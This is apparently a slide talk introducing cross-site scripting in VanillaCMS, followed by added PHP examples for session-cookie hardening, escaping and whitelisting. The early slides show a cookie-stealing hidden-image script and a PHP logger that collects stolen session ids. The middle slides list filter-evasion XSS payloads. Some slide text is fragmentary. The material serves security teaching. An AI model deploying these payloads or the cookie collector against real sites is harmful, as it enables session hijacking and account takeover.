Security & VanillaCMS An XSS Introduction and Attack Demonstration.

XSS: An Introduction
"Cross-Site Scripting": using client-side code (e.g. JavaScript) to send sensitive information off to far-away places.

XSS: An Introduction
Bobby Tables

XSS: An Introduction
Mallory
Oh shit.

XSS: An Introduction
That script could be:
    alert('HA HA.'); alert('Survive make your time.');

XSS: An Introduction
That script could be:
    document.write(document.cookie);

XSS: An Introduction
That script could be:
    document.write(' ');
where the string written into the page is a hidden image whose request carries the cookie:
    <img src=" __csuid=489058e83ee2e832;_PHPSESSID=t57tm1fvvdhonprigkdon71677" style="display:none;" />
Mallory

XSS: An Introduction
Let's have a look at the receiving end:
    <?php
    $fh = fopen('xss.log', 'a');
    fwrite($fh, $_SERVER['HTTP_REFERER'] . var_export($_GET, 1));
    fclose($fh);
What ends up in xss.log (the referring page, then the query string as PHP parsed it):
    mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon71677' => '',)

XSS: An Introduction
So what?
    mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID= t57tm1fvvdhonprigkdon71677 ' => '',)

XSS: An Introduction
Steal the cookie. Get the URL of the CMS. Log in at will, exposing the very soft underbelly that is the CMS.
Time for a demo.
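The chain above works because PHPSESSID is readable from document.cookie and stays valid for as long as the session lives. The following is an added example, not code from the talk or from VanillaCMS, showing the server-side cookie settings that close both halves of that: HttpOnly keeps the id out of script, and regenerating the id on login and on a timer shortens the life of anything that does leak. It assumes PHP 7.3 or later (the array form of session_set_cookie_params()) and that the site is served over HTTPS; the header lines at the bottom are constructed stand-ins for headers_list().

```php
<?php
// Added example (not from the talk or VanillaCMS): session cookie hardening
// against the document.cookie exfiltration shown on the previous slides.
// Assumes PHP 7.3+ and HTTPS in front of the application.
declare(strict_types=1);

// Must run before session_start(). HttpOnly keeps the cookie out of
// document.cookie; Secure keeps it off plain HTTP; SameSite=Lax stops most
// cross-site requests from carrying it along.
function hardenSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // session cookie: gone when the browser closes
        'path'     => '/',
        'domain'   => '',       // current host only
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    ini_set('session.use_strict_mode', '1');   // refuse ids the server never issued
    ini_set('session.use_only_cookies', '1');  // never read the id from the URL
}

// Rotate the id on every privilege change, so an id captured before login
// (or on an earlier page) is not the one carrying the logged-in session.
function loginUser(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
}

// Re-issue the id periodically so even a stolen cookie has a short window.
function touchSession(int $maxAgeSeconds = 900): void
{
    if (isset($_SESSION['login_at']) && time() - $_SESSION['login_at'] > $maxAgeSeconds) {
        session_regenerate_id(true);
        $_SESSION['login_at'] = time();
    }
}

// The check that matters is the Set-Cookie header the browser actually sees.
// Pass headers_list() from a real request, or a constructed list as below.
function sessionCookieFlagsOk(array $headers, string $cookieName = 'PHPSESSID'): bool
{
    foreach ($headers as $h) {
        if (stripos($h, 'Set-Cookie: ' . $cookieName . '=') === 0) {
            return stripos($h, '; HttpOnly') !== false
                && stripos($h, '; Secure') !== false
                && stripos($h, '; SameSite=') !== false;
        }
    }
    return false;   // no session cookie issued at all: also a failure
}

hardenSessionCookie();
session_start();

// Constructed header lines standing in for headers_list() on a real response.
var_dump(sessionCookieFlagsOk(['Set-Cookie: PHPSESSID=abc123; path=/; secure; HttpOnly; SameSite=Lax']));
var_dump(sessionCookieFlagsOk(['Set-Cookie: PHPSESSID=abc123; path=/']));
```

HttpOnly only stops the id from being read and shipped elsewhere; an injected script can still drive the CMS from inside the victim's page with the cookie attached automatically, so this is a containment measure on top of the output escaping the later slides cover, not a replacement for it.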

Filtering and Escaping
The two are sometimes conflated, with side-effects like backslashes or HTML entities turning up in stored data. That is all very well and good, but what happens when you want to put that data into a message or save it out to a text document? "Strip out all tags!" can result in mangled content, e.g. 1 bar then"

Filtering and Escaping
Validation & filtering: checking for and getting rid of the nasties.
  - Checking data is of the correct type, e.g. addresses, postcodes, message text.
  - Stripping out control characters; fixing multibyte encoding shenanigans with iconv().
Escaping: packaging data up for transport.
  - mysql_real_escape_string() for MySQL strings.
  - htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML.
  - urlencode() for query params.
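The split the slide describes, as an added example that is not code from the talk or from VanillaCMS: filter on the way in (type checks, control characters, iconv()), store the data untouched, and escape on the way out for whichever transport it is going over. The postcode pattern, the field names and the sample form input are all constructed for illustration; the SQL part swaps in PDO bound parameters for the mysql_real_escape_string() the slide names, and assumes the pdo_sqlite extension for the in-memory table.

```php
<?php
// Added example (not from the talk or VanillaCMS): filter in, escape out.
// Assumes PHP 7.4+ and the pdo_sqlite extension for the SQL part.
declare(strict_types=1);

// --- Validation & filtering: is the data the type we expect? ---
function filterEmail(string $raw): ?string
{
    $v = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    return $v === false ? null : $v;
}

// UK-style postcode shape; an assumption for illustration, swap in your own rule.
function filterPostcode(string $raw): ?string
{
    $pc = strtoupper(preg_replace('/\s+/', ' ', trim($raw)));
    return preg_match('/^[A-Z]{1,2}\d[A-Z\d]? \d[A-Z]{2}$/', $pc) ? $pc : null;
}

// Message text: repair broken multibyte sequences with iconv(), then drop
// control characters (keeping tab and newline). Tags are deliberately NOT
// stripped: the content stays intact and is escaped later per transport.
function filterMessageText(string $raw): string
{
    $clean = @iconv('UTF-8', 'UTF-8//IGNORE', $raw);
    if ($clean === false) {
        $clean = '';
    }
    return preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $clean);
}

// --- Escaping: package the same stored value for each transport. ---
function escHtml(string $s): string
{
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function escQuery(array $params): string
{
    return http_build_query($params, '', '&', PHP_QUERY_RFC3986);
}

// For SQL, the replacement for mysql_real_escape_string() is to not build the
// string at all: the value travels as a bound parameter.
function findUserByEmail(PDO $db, string $email): ?array
{
    $stmt = $db->prepare('SELECT id, email FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed input: what a comment form might receive. \x07 is a control
// character; the rest is ordinary text that happens to contain angle brackets.
$input = [
    'email'    => 'mallory@example.test',
    'postcode' => 'sw1a 1aa',
    'message'  => "1 < 2 <b>bar</b> \x07then\"",
];

$email   = filterEmail($input['email']);
$pc      = filterPostcode($input['postcode']);
$message = filterMessageText($input['message']);

// One stored value, packaged three ways.
echo 'HTML:  <p>' . escHtml($message) . "</p>\n";
echo 'Query: /search?' . escQuery(['q' => $message]) . "\n";
echo 'Text:  ' . $message . "\n";   // a plain-text e-mail body wants no HTML escaping

$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)');
$db->exec("INSERT INTO users (email) VALUES ('mallory@example.test')");
var_dump(findUserByEmail($db, $email ?? ''));
```

The point of keeping the stored message unescaped is the one the previous slide makes: the same text can then go into HTML, a query string or a plain-text document without anyone having to reverse an escaping step that was done too early.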

Filtering and Escaping
Why don't we just kill any tags we find?
    alert('a')
    "> <IMG SRC=javascr ipt:aler t('XSS')>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    alert('a')
    alert("a");//
    RIPT>alert('a');
    RIPT>
    <img src="javascript:alert('a')"
    <IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' ) " >

Filtering and Escaping
Why don't we just kill any tags we find?
    <iframe src=
    < BODY{-moz-binding:url("
    žscriptualert(EXSSE)ž/scriptu   (US-ASCII encoding evasion)
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Filtering and Escaping
Why don't we just kill any tags we find?
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061
    exp/*
    alert('a');
    .x{background-image:url("javascript:alert('a')");}
    ]]>

Filtering and Escaping
Yeah, no. The transport is HTML; package it appropriately. htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff. Use it even on the things you "trust", like $_SERVER['PHP_SELF'] or REQUEST_URI.
It gets hard when you need to put user data into src="" and style="" attributes; use a whitelist instead, no matter how much of a pain it is to implement. (Or, in the case of images and other files, generate the filename for them yourself.)
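The three hard cases from this slide, as an added example that is not code from the talk or from VanillaCMS: a whitelist for src="" (scheme and host, with the URL rebuilt from parsed parts rather than echoed back), a whitelist for a style value (a fixed lookup, since htmlentities() does nothing useful inside CSS), and an upload filename derived from the file's bytes instead of the client's name. The $_SERVER value gets the same htmlentities() treatment the slide asks for. It assumes PHP 8.0+ (match and str_starts_with); the host list, the colour table and the test inputs (which reuse the javascript:, spaced-out and data: forms from the preceding slides) are constructed.

```php
<?php
// Added example (not from the talk or VanillaCMS): whitelists for the places
// htmlentities() cannot help, plus a generated upload filename. Assumes PHP 8.0+.
declare(strict_types=1);

// src="": accept only http(s) URLs on hosts we choose; reject javascript:,
// data:, and anything parse_url() cannot make sense of.
function safeImageSrc(string $raw, array $allowedHosts): ?string
{
    $parts = parse_url(trim($raw));
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null;
    }
    // Rebuild from the parsed parts rather than echoing the input back.
    $url = $parts['scheme'] . '://' . $parts['host']
         . (isset($parts['port']) ? ':' . $parts['port'] : '')
         . ($parts['path'] ?? '/')
         . (isset($parts['query']) ? '?' . $parts['query'] : '');
    return htmlentities($url, ENT_QUOTES, 'UTF-8');
}

// style="": do not try to escape CSS; pick from a fixed set of values.
function safeColor(string $raw): string
{
    static $allowed = ['red' => '#c00', 'green' => '#0a0', 'blue' => '#00c'];
    return $allowed[strtolower(trim($raw))] ?? '#000';
}

// Uploaded images: never use the client's filename. Take the extension from
// the file signature and the name from a hash of the content.
function storedFilenameFor(string $bytes): ?string
{
    $ext = match (true) {
        str_starts_with($bytes, "\x89PNG")     => 'png',
        str_starts_with($bytes, "\xFF\xD8\xFF") => 'jpg',
        default                                 => null,
    };
    return $ext === null ? null : hash('sha256', $bytes) . '.' . $ext;
}

// The "trusted" $_SERVER values get exactly the same treatment as user input.
function selfUrl(): string
{
    return htmlentities($_SERVER['REQUEST_URI'] ?? '/', ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: one good URL, the javascript:/spaced/data: forms from the
// cheat-sheet slides, and a well-formed URL on a host we did not whitelist.
$attempts = [
    'https://img.example.test/cat.png',
    "javascript:alert('a')",
    "  j a v a s c r i p t : a l e r t ( ' a ' )  ",
    'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K',
    'https://evil.example.test/x.png',
];
foreach ($attempts as $a) {
    $src = safeImageSrc($a, ['img.example.test']);
    echo str_pad(var_export($a, true), 72) . ' => ' . ($src ?? 'rejected') . "\n";
}

echo '<div style="color:' . safeColor('red;background:url(javascript:alert(1))') . '">' . "\n";
echo storedFilenameFor("\x89PNG\r\n\x1a\nconstructed-png-body") . "\n";
var_dump(storedFilenameFor('<script>not an image</script>'));
echo '<form action="' . selfUrl() . '">' . "\n";
```

Only the first attempt survives; everything else is rejected outright rather than "cleaned", which is the whole point of a whitelist: there is no filter to evade when the only things that get through are the things you listed.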